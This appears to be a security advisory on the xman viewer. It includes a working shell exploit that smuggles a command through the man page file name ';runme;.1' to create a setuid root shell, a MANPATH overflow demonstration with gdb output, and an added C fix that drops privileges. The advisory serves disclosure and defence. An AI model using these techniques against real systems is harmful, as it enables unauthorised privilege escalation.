COMMAND
 xman
SYSTEMS AFFECTED
 xman
PROBLEM
 'Vade79' found the following. xman doesn't drop privileges anywhere
 in the program, but does support suid installation. So,
 exploiting via a system call is much easier than the buffer
 overflow in MANPATH, mentioned in some earlier advisories. Here
 is an example of such an exploitation possibility:
 #!/bin/sh
 # example of xman exploitation. xman
 # supports privileges. but, never
 # drops them.
 # Vade79 -> v9@realhalo.org -> realhalo.org.
 MANPATH=~/xmantest/
 mkdir -p ~/xmantest/man1
 cd ~/xmantest/man1
 touch ';runme;.1'
 cat << EOF>~/xmantest/runme
 #!/bin/sh
 cp /bin/sh ~/xmansh
 chown `id -u` ~/xmansh
 chmod 4755 ~/xmansh
 EOF
 chmod 755 ~/xmantest/runme
 echo "click the ';runme;' selection," \
 "exit. then, check for ~/xmansh."
 xman -bothshown -notopbox
 rm -rf ~/xmantest
 
 'KF' added the following. xman from at least
 X11R6-contrib-3.3.2-3.i386.rpm suffers from a classic overflow.
 [root@linux lib]# ls -al `which xman`
 -rwxr-sr-x 1 root man 41076 Jun 17 1998 /usr/X11R6/bin/xman*
 
 [root@linux lib]# xman
 [root@linux lib]# export MANPATH=`perl -e 'print "A" x 7000'`
 [root@linux lib]# xman
 Xman Error: Could not allocate memory for manual sections.
 
 [root@linux lib]# export MANPATH=`perl -e 'print "A" x 70000'`
 [root@linux lib]# xman
 Segmentation fault
 
 [root@linux lib]# gdb xman
 GNU gdb 5.0mdk-11mdk Linux-Mandrake 8.0
 (gdb) run
 Starting program: /usr/X11R6/bin/xman
 0x4022fb66 in getenv () from /lib/libc.so.6
 (gdb) bt
 #0 0x4022fb66 in getenv () from /lib/libc.so.6
 #1 0x0804bc47 in _start ()
 #2 0x41414141 in ?? ()
 Cannot access memory at address 0x41414141
 
 (gdb) info registers
 eax 0xbffee784 -1073813628
 ecx 0x804fb29 134544169
 edx 0x805414c 134562124
 ebx 0x40328f2c 1077055276
 esp 0xbffec6fc 0xbffec6fc
 ebp 0xbffec714 0xbffec714
 esi 0x6 6
 edi 0x41414141 1094795585
 eip 0x4022fb66 0x4022fb66
SOLUTION
 Nothing yet.
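
 The first problem above comes from two things together: the set-id program keeps its privileges, and a page file name reaches a shell. The C sketch below is an added example (not xman source and not part of the original advisory) of the usual fix: drop privileges permanently in the child and run the helper with an argument vector instead of a shell. The function names and the use of /bin/echo as a stand-in for the page formatter are assumptions made for the example.

```c
#include <stdio.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Permanently drop set-id privileges, group before user. On Linux,
 * passing the real ID as both arguments also resets the saved ID, so
 * the old effective ID cannot be restored. Returns 0 on success. */
int drop_privileges(void)
{
    gid_t rgid = getgid();
    uid_t ruid = getuid();

    if (setregid(rgid, rgid) != 0 || setreuid(ruid, ruid) != 0)
        return -1;
    return (getegid() == rgid && geteuid() == ruid) ? 0 : -1;
}

/* Run a helper on a page file name without a shell. The name is a
 * single argv element, so ';' and other metacharacters are plain
 * bytes. Returns the helper's exit status, or -1 on failure. */
int run_helper(const char *helper, const char *name)
{
    int status;
    pid_t pid = fork();

    if (pid < 0)
        return -1;
    if (pid == 0) {
        if (drop_privileges() != 0)
            _exit(126);              /* never exec while privileged */
        execl(helper, helper, "--", name, (char *)NULL);
        _exit(127);                  /* exec itself failed */
    }
    if (waitpid(pid, &status, 0) < 0 || !WIFEXITED(status))
        return -1;
    return WEXITSTATUS(status);
}

int main(void)
{
    /* Constructed input: the hostile file name used on this page. */
    int rc = run_helper("/bin/echo", ";runme;.1");

    printf("helper exit status: %d\n", rc);
    return rc == 0 ? 0 : 1;
}
```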
